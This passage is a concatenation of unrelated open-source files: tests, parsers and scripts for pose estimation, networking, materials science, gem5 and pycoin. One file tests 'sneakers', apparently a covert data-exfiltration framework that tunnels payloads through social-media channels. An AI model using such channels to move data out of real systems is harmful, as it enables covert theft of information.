# loss = (output1 - target_var) ** 2 + (output2 - target_var) ** 2
output1 = net(input)
tmp_loss = (output1 - heatmap) ** 2
loss = tmp_loss.sum() / tmp_loss.numel()
# for per_out in output1:
# tmp_loss = (per_out - heatmap) ** 2
# loss = loss + tmp_loss.sum() / tmp_loss.numel()
# flipping the image
img_flip = img.numpy()[:, :, :, ::-1].copy()
img_flip = torch.from_numpy(img_flip)
# input_var = torch.autograd.Variable(img_flip, volatile=True)
input = img_flip.cuda(non_blocking=True)
# output11, output22 = net(input_var)
output2 = net(input)
output2 = HumanAug.flip_channels(output2.cpu())
output2 = HumanAug.shuffle_channels_for_horizontal_flipping(output2, joint_flip_index)
output = (output1.cpu() + output2) / 2
# calculate measure
# pred_pts = HumanPts.heatmap2pts(output) # b x L x 2
# pts = HumanPts.heatmap2pts(target_var.cpu().data)
# pckh = HumanAcc.approx_PCKh(pred_pts, pts, idx, heatmap.size(3)) # b -> 1
pckh = Evaluation.accuracy(output, heatmap.cpu(), idx)
pckhs.update(pckh[0])
pckh_origin_res = Evaluation.accuracy_origin_res(output, center, scale, [64, 64],
grnd_pts, normalizer, rot)
pckhs_origin_res.update(pckh_origin_res[0])
# """measure elapsed time"""
# batch_time.update(time.time() - end)
# end = time.time()
# print log
losses.update(loss.item())
loss_dict = OrderedDict([('loss', losses.avg),
('pckh', pckhs.avg),
('pckh_origin_res', pckhs_origin_res.avg)])
visualizer.print_log(epoch, i, len(val_loader), value1=loss_dict)
# img_batch_list.append(img)
# pts_batch_list.append(pred_pts*4.)
preds = Evaluation.final_preds(output, center, scale, [64, 64], rot)
for n in range(output.size(0)):
predictions[index[n], :, :] = preds[n, :, :]
# if i == 1:
# break
return losses.avg, pckhs_origin_res.avg, predictions
if __name__ == '__main__':
main()
|
sneakers/tests/test_all.py | jayvdb/sneaky-creeper | 146 | 12690838 | import unittest
import json
import random
import string
import os
from unittest.case import SkipTest
from nose.tools import assert_equals, assert_in
from functools import partial
from twython import TwythonError
import sneakers
basePath = os.path.dirname(os.path.abspath(sneakers.__file__))
def unit_channel(channel, data):
""" Test a channel. """
t = sneakers.Exfil(channel, [])
# get parameters from config folder
configPath = os.path.join(basePath, 'config', '{}-config.json'.format(channel))
try:
with open(configPath) as f:
params = json.loads(f.read())
except:
raise SkipTest('could not load configuration file for {}'.format(channel))
t.set_channel_params({'sending': params[channel],
'receiving': params[channel]})
try:
t.send(data)
except TwythonError as e:
# something out of our control
raise SkipTest("Twython error occurred: {}".format(e))
got = t.receive()
if len(data) > 300:
assert_in(data, got,
'Failed in assertion for the \'{}\' channel with a very large payload.'.format(channel))
else:
assert_in(data, got)
######################################################
#################### Actual Tests ####################
######################################################
def test_AllChannelsBasic():
""" Test all channels with basic alphanumeric characters. """
# need to have some random; a few platforms (looking at you, Twitter) have
# issues if you post the same thing multiple times
rand = ''.join([random.choice(string.letters) for i in range(5)])
data = ''.join([string.letters, string.digits, rand])
for channel in sneakers.Exfil.list_channels() :
f = partial(unit_channel, channel, data)
f.description = "Test the {} channel with basic alphanumeric characters.".format(channel)
yield (f, )
def test_AllChannelsAdvanced():
""" Test all channels with a full range of printable characters. """
# need to have some random; a few platforms (looking at you, Twitter) have
# issues if you post the same thing multiple times
rand = ''.join([random.choice(string.letters) for i in range(5)])
our_printable = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ "
# excludes \t\r\n
data = ''.join([our_printable, rand])
for channel in sneakers.Exfil.list_channels() :
f = partial(unit_channel, channel, data)
f.description = "Test the {} channel with the full range of printable characters.".format(channel)
yield (f, )
def test_AllChannelsLong():
""" Test all channels with long messages. """
data = ''.join([random.choice(string.letters) for i in range(500000)])
for channel in sneakers.Exfil.list_channels() :
f = partial(unit_channel, channel, data)
f.description = "Test the {} channel with a very long message.".format(channel)
yield (f, )
|
src/genie/libs/parser/comware/tests/DisplayInterfaces/cli/equal/golden_output_expected.py | balmasea/genieparser | 204 | 12690858 | expected_output = {
"GigabitEthernet3/8/0/38": {
"auto_negotiate": True,
"counters": {
"normal": {
"in_broadcast_pkts": 1093,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 18864,
"in_octets": 0,
"in_pkts": 7446905,
"in_unicast_pkts": 7426948,
"out_broadcast_pkts": 373635,
"out_mac_pause_frames": 0,
"out_multicast_pkts": 34367737,
"out_octets": 0,
"out_pkts": 40981139,
"out_unicast_pkts": 6239767
},
"in_abort": 0,
"in_broadcast_pkts": 1093,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 18864,
"in_octets": 10280397282,
"in_overrun": 0,
"in_parity_errors": 0,
"in_pkts": 7446905,
"in_runts": 0,
"in_throttles": 0,
"in_unicast_pkts": 7426948,
"last_clear": "Never",
"out_abort": 0,
"out_broadcast_pkts": 373635,
"out_buffer_failure": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_multicast_pkts": 34367737,
"out_no_carrier": 0,
"out_octets": 44666966188,
"out_pkts": 40981139,
"out_underruns": 0,
"out_unicast_pkts": 6239767,
"rate": {
"in_rate_bytes": 0,
"in_rate_pkts": 0,
"load_interval": 300,
"out_rate_bytes": 0,
"out_rate_pkts": 0
}
},
"description": "GigabitEthernet3/8/0/38 Interface",
"duplex_mode": "unknown",
"enabled": True,
"frame_type": "PKTFMT_ETHNT_2",
"mac_address": "cc3e-5f69-5751",
"max_frame_length": 9216,
"media_type": "twisted pair",
"oper_status": "DOWN",
"port_speed": "unknown",
"port_type": "1000_BASE_T",
"priority": 0,
"pvid": 17,
"switchport": {
"mode": "access",
"untagged": 17
},
"type": "GigabitEthernet"
}
}
|
pymatgen/util/tests/test_num_utils.py | wangyusu/pymatgen | 921 | 12690861 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import random
import unittest
from pymatgen.util.num import abs_cap, min_max_indexes, round_to_sigfigs
__author__ = "<NAME>"
__copyright__ = "Copyright 2013, The Materials Project"
__version__ = "0.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__date__ = "9/25/14"
class FuncTestCase(unittest.TestCase):
def test_abs_cap(self):
self.assertEqual(abs_cap(1.000000001), 1.0)
self.assertEqual(abs_cap(-1.000000001), -1.0)
v = random.uniform(-1, 1)
self.assertEqual(abs_cap(v), v)
self.assertEqual(abs_cap(1.000000001, 2), 1.000000001)
self.assertEqual(abs_cap(-2.000000001, 2), -2.0)
def test_min_max_indexes(self):
val = ["b", "a", "m", "z", "y"]
min_ind, max_ind = min_max_indexes(val)
self.assertEqual(min_ind, 1)
self.assertEqual(max_ind, 3)
def test_round(self):
vals = [424.2425, 2.3425356, 0.000042535636653, 0.23, 2.468e6, 0, -1.392156]
sigfigs = range(1, 6)
rounded_vals = [
[400.0, 420.0, 424.0, 424.2, 424.24],
[2.0, 2.3, 2.34, 2.343, 2.3425],
[4e-5, 4.3e-5, 4.25e-5, 4.254e-5, 4.2536e-5],
[0.2, 0.23, 0.23, 0.23, 0.23],
[2e6, 2.5e6, 2.47e6, 2.468e6, 2.468e6],
[0, 0, 0, 0, 0],
[-1, -1.4, -1.39, -1.392, -1.3922],
]
for v, val in enumerate(vals):
for s, sig in enumerate(sigfigs):
self.assertEqual(round_to_sigfigs(val, sig), rounded_vals[v][s])
with self.assertRaises(ValueError):
round_to_sigfigs(3.5, -2)
with self.assertRaises(TypeError):
round_to_sigfigs(3.5, 3.5)
if __name__ == "__main__":
unittest.main()
|
ryu/tests/unit/packet/test_bmp.py | umkcdcrg01/ryu_openflow | 269 | 12690863 | <filename>ryu/tests/unit/packet/test_bmp.py
# Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from nose.tools import eq_
from nose.tools import ok_
from time import time
from ryu.lib.packet import bmp
from ryu.lib.packet import bgp
from ryu.lib.packet import afi
from ryu.lib.packet import safi
class Test_bmp(unittest.TestCase):
""" Test case for ryu.lib.packet.bmp
"""
def setUp(self):
pass
def tearDown(self):
pass
def test_route_monitoring(self):
update = bgp.BGPUpdate()
msg = bmp.BMPRouteMonitoring(bgp_update=update,
peer_type=bmp.BMP_PEER_TYPE_GLOBAL,
is_post_policy=True,
peer_distinguisher=0,
peer_address='192.0.2.1',
peer_as=30000,
peer_bgp_id='192.0.2.1',
timestamp=time())
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(), msg2.to_jsondict())
eq_(rest, '')
def test_statistics_report(self):
stats = [{'type': bmp.BMP_STAT_TYPE_REJECTED, 'value': 100},
{'type': bmp.BMP_STAT_TYPE_DUPLICATE_PREFIX, 'value': 200},
{'type': bmp.BMP_STAT_TYPE_DUPLICATE_WITHDRAW, 'value': 300},
{'type': bmp.BMP_STAT_TYPE_ADJ_RIB_IN, 'value': 100000},
{'type': bmp.BMP_STAT_TYPE_LOC_RIB, 'value': 500000}]
msg = bmp.BMPStatisticsReport(stats=stats,
peer_type=bmp.BMP_PEER_TYPE_GLOBAL,
is_post_policy=True,
peer_distinguisher=0,
peer_address='192.0.2.1',
peer_as=30000,
peer_bgp_id='192.0.2.1',
timestamp=time())
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(), msg2.to_jsondict())
eq_(rest, '')
def test_peer_down_notification(self):
reason = bmp.BMP_PEER_DOWN_REASON_LOCAL_BGP_NOTIFICATION
data = "hoge"
data = bgp.BGPNotification(error_code=1, error_subcode=2, data=data)
msg = bmp.BMPPeerDownNotification(reason=reason, data=data,
peer_type=bmp.BMP_PEER_TYPE_GLOBAL,
is_post_policy=True,
peer_distinguisher=0,
peer_address='192.0.2.1',
peer_as=30000,
peer_bgp_id='192.0.2.1',
timestamp=time())
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(), msg2.to_jsondict())
eq_(rest, '')
def test_peer_up_notification(self):
opt_param = [bgp.BGPOptParamCapabilityUnknown(cap_code=200,
cap_value='hoge'),
bgp.BGPOptParamCapabilityRouteRefresh(),
bgp.BGPOptParamCapabilityMultiprotocol(
afi=afi.IP, safi=safi.MPLS_VPN)]
open_message = bgp.BGPOpen(my_as=40000, bgp_identifier='192.0.2.2',
opt_param=opt_param)
msg = bmp.BMPPeerUpNotification(local_address='192.0.2.2',
local_port=179,
remote_port=11089,
sent_open_message=open_message,
received_open_message=open_message,
peer_type=bmp.BMP_PEER_TYPE_GLOBAL,
is_post_policy=True,
peer_distinguisher=0,
peer_address='192.0.2.1',
peer_as=30000,
peer_bgp_id='192.0.2.1',
timestamp=time())
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(), msg2.to_jsondict())
eq_(rest, '')
def test_initiation(self):
initiation_info = [{'type': bmp.BMP_INIT_TYPE_STRING,
'value': u'This is Ryu BGP BMP message'}]
msg = bmp.BMPInitiation(info=initiation_info)
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(lambda v: v), msg2.to_jsondict(lambda v: v))
eq_(rest, '')
def test_termination(self):
termination_info = [{'type': bmp.BMP_TERM_TYPE_STRING,
'value': u'Session administatively closed'},
{'type': bmp.BMP_TERM_TYPE_REASON,
'value': bmp.BMP_TERM_REASON_ADMIN}]
msg = bmp.BMPTermination(info=termination_info)
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(lambda v: v), msg2.to_jsondict(lambda v: v))
eq_(rest, '')
|
app/apiv2/plans/plans.py | Joey-Wondersign/Staffjoy-suite-Joey | 890 | 12690865 | from flask_restful import Resource
from app.constants import API_ENVELOPE, PLAN_PUBLIC_KEYS
from app.plans import plans
class PlansApi(Resource):
# Public (for authenticated users)
def get(self):
# Flatten dict to an array to match rest of api style
output = []
for plan_id, value in plans.iteritems():
clean_plan = {"id": plan_id}
for key in PLAN_PUBLIC_KEYS:
clean_plan[key] = value.get(key)
output.append(clean_plan)
return {
API_ENVELOPE: output,
}
|
CV/CLPI-Collaborative-Learning-for-Diabetic-Retinopathy-Grading/parser.py | zhangyimi/Research | 1,319 | 12690866 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
def args_parser():
'''Common classifier application command-line arguments.
'''
parser = argparse.ArgumentParser(
description='image classification model command-line')
parser.add_argument('--arch', '-a', metavar='ARCH', default='DenseNet121')
parser.add_argument('--data', '-d', default='./data')
parser.add_argument('--resume-from', dest='resumed_checkpoint_path', default='',
type=str, metavar='PATH',
help='path to latest checkpoint. Use to resume paused training session.')
parser.add_argument('--infer-file', dest='infer_file')
parser.add_argument('--infer-classdim', dest='infer_classdim', default=5)
return parser
|
SRT/exps/BASE-eval-image.py | yerang823/landmark-detection | 612 | 12690869 | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
# For the regression-based detector:
# python exps/BASE-eval-image.py --image ./cache_data/cache/self.jpeg --face 250 150 900 1100 --model ${check_point_path}
#
from __future__ import division
import sys, time, torch, random, argparse, PIL
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
from pathlib import Path
import numpy as np
lib_dir = (Path(__file__).parent / '..' / 'lib').resolve()
if str(lib_dir) not in sys.path: sys.path.insert(0, str(lib_dir))
assert sys.version_info.major == 3, 'Please upgrade from {:} to Python 3.x'.format(sys.version_info)
from datasets import GeneralDatasetV2 as Dataset, PointMeta2V as PointMeta, pil_loader
from xvision import transforms2v as transforms, draw_image_by_points
from xvision import normalize_points, denormalize_points
from models import obtain_pro_model, remove_module_dict
from config_utils import load_configure
def evaluate(args):
if args.cuda:
assert torch.cuda.is_available(), 'CUDA is not available.'
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
print ('Use the GPU mode')
else:
print ('Use the CPU mode')
print ('The image is {:}'.format(args.image))
print ('The model is {:}'.format(args.model))
last_info_or_snap = Path(args.model)
assert last_info_or_snap.exists(), 'The model path {:} does not exist'.format(last_info)
last_info_or_snap = torch.load(last_info_or_snap, map_location=torch.device('cpu'))
if 'last_checkpoint' in last_info_or_snap:
snapshot = last_info_or_snap['last_checkpoint']
assert snapshot.exists(), 'The model path {:} does not exist'.format(snapshot)
print ('The face bounding box is {:}'.format(args.face))
assert len(args.face) == 4, 'Invalid face input : {:}'.format(args.face)
snapshot = torch.load(snapshot, map_location=torch.device('cpu'))
else:
snapshot = last_info_or_snap
param = snapshot['args']
# General Data Argumentation
if param.use_gray == False:
mean_fill = tuple( [int(x*255) for x in [0.485, 0.456, 0.406] ] )
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std =[0.229, 0.224, 0.225])
else:
mean_fill = (0.5,)
normalize = transforms.Normalize(mean=[mean_fill[0]], std=[0.5])
eval_transform = transforms.Compose2V([transforms.ToTensor(), normalize, \
transforms.PreCrop(param.pre_crop_expand), \
transforms.CenterCrop(param.crop_max)])
model_config = load_configure(param.model_config, None)
# dataset = Dataset(eval_transform, param.sigma, model_config.downsample, param.heatmap_type, (120, 96), param.use_gray, None, param.data_indicator)
dataset = Dataset(eval_transform, param.sigma, model_config.downsample, param.heatmap_type, (param.height, param.width), param.use_gray, None, param.data_indicator)
dataset.reset( param.num_pts )
net = obtain_pro_model(model_config, param.num_pts, param.sigma, param.use_gray)
net.eval()
try:
net.load_state_dict( snapshot['detector'] )
except:
net.load_state_dict( remove_module_dict(snapshot['detector']) )
if args.cuda: net = net.cuda()
print ('Processing the input face image.')
face_meta = PointMeta(dataset.NUM_PTS, None, args.face, args.image, 'BASE-EVAL')
face_img = pil_loader(args.image, dataset.use_gray)
affineImage, heatmaps, mask, norm_trans_points, transthetas, _, _, _, shape = dataset._process_(face_img, face_meta, -1)
# network forward
with torch.no_grad():
if args.cuda: inputs = affineImage.unsqueeze(0).cuda()
else : inputs = affineImage.unsqueeze(0)
batch_locs = net(inputs)
batch_locs = batch_locs.cpu()
(batch_size, C, H, W), num_pts = inputs.size(), param.num_pts
norm_locs = torch.cat((batch_locs[0].transpose(1,0), torch.ones(1, num_pts)), dim=0)
norm_locs = torch.mm(transthetas[:2, :], norm_locs)
real_locs = denormalize_points(shape.tolist(), norm_locs)
print ('the coordinates for {:} facial landmarks:'.format(param.num_pts))
for i in range(param.num_pts):
point = real_locs[:, i]
print ('the {:02d}/{:02d}-th landmark : ({:.1f}, {:.1f})'.format(i, param.num_pts, float(point[0]), float(point[1])))
if args.save:
resize = 512
image = draw_image_by_points(args.image, real_locs, 2, (255, 0, 0), args.face, resize)
image.save(args.save)
print ('save the visualization results into {:}'.format(args.save))
else:
print ('ignore the visualization procedure')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluate a single image by the trained model', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--image', type=str, help='The evaluation image path.')
parser.add_argument('--model', type=str, help='The snapshot to the saved detector.')
parser.add_argument('--face', nargs='+', type=float, help='The coordinate [x1,y1,x2,y2] of a face')
parser.add_argument('--save', type=str, help='The path to save the visualized results.')
parser.add_argument('--cuda', action='store_true', help='Use cuda or not.')
args = parser.parse_args()
evaluate(args)
|
PyFlow/UI/CompileUiQt.py | luzpaz/PyFlow | 1,463 | 12690901 | ## Copyright 2015-2019 <NAME>, <NAME>
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import os
import pyside2uic
import subprocess
CURRENT_DIR = os.path.dirname(__file__).replace('\\', '/') + '/'
INTERPRETER_PATH = 'python.exe'
def ui_to_py(ui_file):
if not os.path.isfile(ui_file):
msg = 'no such file'
print(msg)
return msg
py_file_name = os.path.splitext(ui_file)[0] + '.py'
with open(py_file_name, 'w') as py_file:
try:
pyside2uic.compileUi(ui_file, py_file)
print('{0} converted to {1}.'.format(ui_file.upper(), py_file_name.upper()))
except Exception as e:
print('Error: compilation error.', e)
bakFileName = py_file_name.replace(".py", "_backup.py")
# convert to cross compatible code
subprocess.call([INTERPRETER_PATH, '-m', 'Qt', '--convert', py_file_name])
if(os.path.isfile(bakFileName)):
os.remove(bakFileName)
print("REMOVING", bakFileName)
def compile():
for d, dirs, files in os.walk(CURRENT_DIR):
if "Python" in d or ".git" in d:
continue
for f in files:
if "." in f:
ext = f.split('.')[1]
if ext == 'ui':
uiFile = os.path.join(d, f)
ui_to_py(uiFile)
if __name__ == '__main__':
compile()
|
src/numbers_parser/_unpack_numbers.py | jessie-murray/numbers-parser | 110 | 12690932 | <filename>src/numbers_parser/_unpack_numbers.py
# vi: ft=python
import argparse
import os
import json
import re
import sys
from numbers_parser.unpack import read_numbers_file
from numbers_parser import _get_version
from numbers_parser.iwafile import IWAFile
from numbers_parser.exceptions import FileFormatError
def ensure_directory_exists(prefix, path):
"""Ensure that a path's directory exists."""
parts = os.path.split(path)
try:
os.makedirs(os.path.join(*([prefix] + list(parts[:-1]))))
except OSError:
pass
def convert_uuids_to_hex(obj):
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, dict) or isinstance(v, list):
convert_uuids_to_hex(v)
elif k == "lower" or k == "upper":
obj[k] = "0x{0:0{1}X}".format(int(v), 16)
elif k in ["uuidW0", "uuidW1", "uuidW2", "uuidW3"]:
obj[k] = "0x{0:0{1}X}".format(v, 8)
elif isinstance(obj, list):
for v in obj:
if isinstance(v, dict) or isinstance(v, list):
convert_uuids_to_hex(v)
def process_file(contents, filename, output_dir, hex_uuids):
filename = re.sub(r".*\.numbers/", "", filename)
ensure_directory_exists(output_dir, filename)
target_path = os.path.join(output_dir, filename)
if isinstance(contents, IWAFile):
target_path = target_path.replace(".iwa", "")
target_path += ".txt"
with open(target_path, "w") as out:
data = contents.to_dict()
if hex_uuids:
convert_uuids_to_hex(data)
print(json.dumps(data, sort_keys=True, indent=4), file=out)
else:
with open(target_path, "wb") as out:
out.write(contents)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("document", help="Apple Numbers file(s)", nargs="*")
parser.add_argument("-V", "--version", action="store_true")
parser.add_argument("--hex-uuids", action="store_true", help="print UUIDs as hex")
parser.add_argument("--output", "-o", help="directory name to unpack into")
args = parser.parse_args()
if args.version:
print(_get_version())
elif args.output is not None and len(args.document) > 1:
print(
"unpack-numbers: error: output directory only valid with a single document",
file=sys.stderr,
)
sys.exit(1)
elif len(args.document) == 0:
parser.print_help()
else:
for document in args.document:
output_dir = args.output or document.replace(".numbers", "")
try:
read_numbers_file(
document,
handler=lambda contents, filename: process_file(
contents, filename, output_dir, args.hex_uuids
),
store_objects=False,
)
except FileFormatError as e:
print(f"{document}:", str(e), file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
# execute only if run as a script
main()
|
examples/plugins/robustness/test_distance_attack.py | Harald-R/aw_nas | 195 | 12690963 | # pylint: disable-all
"""
Test a final model with distance attacks
"""
import os
import copy
import argparse
import subprocess
import yaml
if __name__ == "__main__":
TEST_TYPES = {
"BIM_L2": {
"adversary_type": "L2BasicIterativeAttack",
"distance_type": "MeanSquaredDistance",
},
"BIM_LINF": {
"adversary_type": "LinfinityBasicIterativeAttack",
"distance_type": "Linfinity",
},
"CW_L2": {
"adversary_type": "CarliniWagnerL2Attack",
"distance_type": "MeanSquaredDistance",
},
"DEEPFOOL_L2": {
"adversary_type": "DeepFoolL2Attack",
"distance_type": "MeanSquaredDistance",
},
"DEEPFOOL_LINF": {
"adversary_type": "DeepFoolLinfinityAttack",
"distance_type": "Linfinity",
},
}
parser = argparse.ArgumentParser()
parser.add_argument("cfg_file")
parser.add_argument("--load", default=None, help="load a checkpoint")
parser.add_argument(
"--load_state_dict", default=None, help="load checkpoint's state dict"
)
parser.add_argument(
"--type",
"-t",
required=True,
action="append",
default=[],
help="distance attack type",
choices=list(TEST_TYPES.keys()) + [t.lower() for t in TEST_TYPES.keys()],
)
parser.add_argument("--gpu", default=0, type=int)
args = parser.parse_args()
assert (
args.load is not None or args.load_state_dict is not None
), "Checkpoint Required."
with open(args.cfg_file, "r") as rf:
base_cfg = yaml.load(rf)
test_cfg_files = []
log_files = []
save_path = (
args.load if args.load is not None else os.path.dirname(args.load_state_dict)
)
for test_type in args.type:
cfg = copy.deepcopy(base_cfg)
cfg["objective_type"] = "adversarial_distance_objective"
cfg["objective_cfg"] = {}
cfg["objective_cfg"]["mean"] = base_cfg["objective_cfg"]["mean"]
cfg["objective_cfg"]["std"] = base_cfg["objective_cfg"]["std"]
cfg["objective_cfg"]["num_classes"] = base_cfg["objective_cfg"].get(
"num_classes", base_cfg["final_model_cfg"].get("num_classes", 10)
)
cfg["objective_cfg"].update(TEST_TYPES[test_type.upper()])
test_cfg_files.append(
"{}-test-{}.yaml".format(
os.path.splitext(args.cfg_file)[0], test_type.upper()
)
)
log_files.append(
os.path.join(save_path, "test-{}.log".format(test_type.upper()))
)
with open(test_cfg_files[-1], "w") as wf:
yaml.dump(cfg, wf)
for test_type, test_cfg_file, log_file in zip(args.type, test_cfg_files, log_files):
print(
"****Test {}. Test cfg: {}. Log saved to {}.****".format(
test_type, test_cfg_file, log_file
)
)
if args.load_state_dict is not None:
subprocess.check_call(
"awnas test {} --load-state-dict {} --gpus {} -s test 2>&1 | tee {}".format(
test_cfg_file, args.load_state_dict, args.gpu, log_file
),
shell=True,
)
elif args.load is not None:
subprocess.check_call(
"awnas test {} --load {} --gpus {} -s test 2>&1 | tee {}".format(
test_cfg_file, args.load, args.gpu, log_file
),
shell=True,
)
|
tests/gem5/memory/test.py | hyu-iot/gem5 | 765 | 12690971 | <filename>tests/gem5/memory/test.py<gh_stars>100-1000
# Copyright (c) 2018 The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Test file for simple memory test
TODO: Add stats checking
'''
from testlib import *
gem5_verify_config(
name='simple_mem_default',
verifiers=(), # No need for verfiers this will return non-zero on fail
config=joinpath(getcwd(), 'simple-run.py'),
config_args = [],
valid_isas=(constants.null_tag,),
)
simple_mem_params = [
('inf-bandwidth', {'bandwidth': '0GB/s'}),
('low-latency', {'latency': '1ns'}),
('high-latency', {'latency': '1us'}),
('low-bandwidth', {'bandwidth': '1MB/s'}),
('high-var', {'latency_var': '100ns'})
]
for name, params in simple_mem_params:
args = ['--' + key + '=' + val for key,val in params.items()]
gem5_verify_config(
name='simple_mem_' + name,
verifiers=(), # No need for verfiers this will return non-zero on fail
config=joinpath(getcwd(), 'simple-run.py'),
config_args = args,
valid_isas=(constants.null_tag,),
) # This tests for validity as well as performance
gem5_verify_config(
name='memtest',
verifiers=(), # No need for verfiers this will return non-zero on fail
config=joinpath(getcwd(), 'memtest-run.py'),
config_args = [],
valid_isas=(constants.null_tag,),
)
null_tests = [
('garnet_synth_traffic', ['--sim-cycles', '5000000']),
('memcheck', ['--maxtick', '2000000000', '--prefetchers']),
('ruby_mem_test', ['--abs-max-tick', '20000000',
'--functional', '10']),
('ruby_random_test', ['--maxloads', '5000']),
('ruby_direct_test', ['--requests', '50000']),
]
for basename_noext, args in null_tests:
gem5_verify_config(
name=basename_noext,
fixtures=(),
verifiers=(),
config=joinpath(config.base_dir, 'configs',
'example', basename_noext + '.py'),
config_args=args,
valid_isas=(constants.null_tag,),
valid_hosts=constants.supported_hosts,
)
|
tests/sighash_single_test.py | jaschadub/pycoin | 1,210 | 12690979 | <gh_stars>1000+
import unittest
from pycoin.ecdsa.secp256k1 import secp256k1_generator
from pycoin.encoding.hexbytes import b2h, b2h_rev
from pycoin.intbytes import int2byte
from pycoin.networks.registry import network_for_netcode
from pycoin.satoshi.der import sigdecode_der, sigencode_der
PRIV_KEYS = (
2330949616242593315303241053456316633827293588958882755297900732239663851861,
4437411780076344925846479906614060621668407514498402815534040340772719979673,
14311886404724799688521454580288220586308410691395501373612453626821267193196,
16404731722033649474165521611800542240555275746052963990137782680023514762282,
92715304942310420502826004911529506622922082818576946681102234225452853924813,
103235678552410630318322729483874198805317322052500844759252733409163632402845,
)
def sigcheck(a_key, a_hash_for_sig, a_sig):
"""
Returns True if a_key was used to generate a_sig from a_hash_for_sig;
False otherwise.
"""
r, s = sigdecode_der(a_sig)
return secp256k1_generator.verify(a_key.public_pair(), a_hash_for_sig, (r, s))
def sigmake(a_key, a_hash_for_sig, a_sig_type):
"""
Signs a_hash_for_sig with a_key and returns a DER-encoded signature
with a_sig_type appended.
"""
order = secp256k1_generator.order()
r, s = secp256k1_generator.sign(a_key.secret_exponent(), a_hash_for_sig)
if s + s > order:
s = order - s
return sigencode_der(r, s) + int2byte(a_sig_type)
class SighashSingleTest(unittest.TestCase):
def test_sighash_single(self):
for netcode in ["BTC", "XTN"]:
self._test_sighash_single(network_for_netcode(netcode))
def _test_sighash_single(self, network):
flags = network.validator.flags
k0, k1, k2, k3, k4, k5 = [
network.keys.private(secret_exponent=se, is_compressed=True) for se in PRIV_KEYS]
# Fake a coinbase transaction
coinbase_tx = network.tx.coinbase_tx(k0.sec(), 500000000)
for k in [k1, k2]:
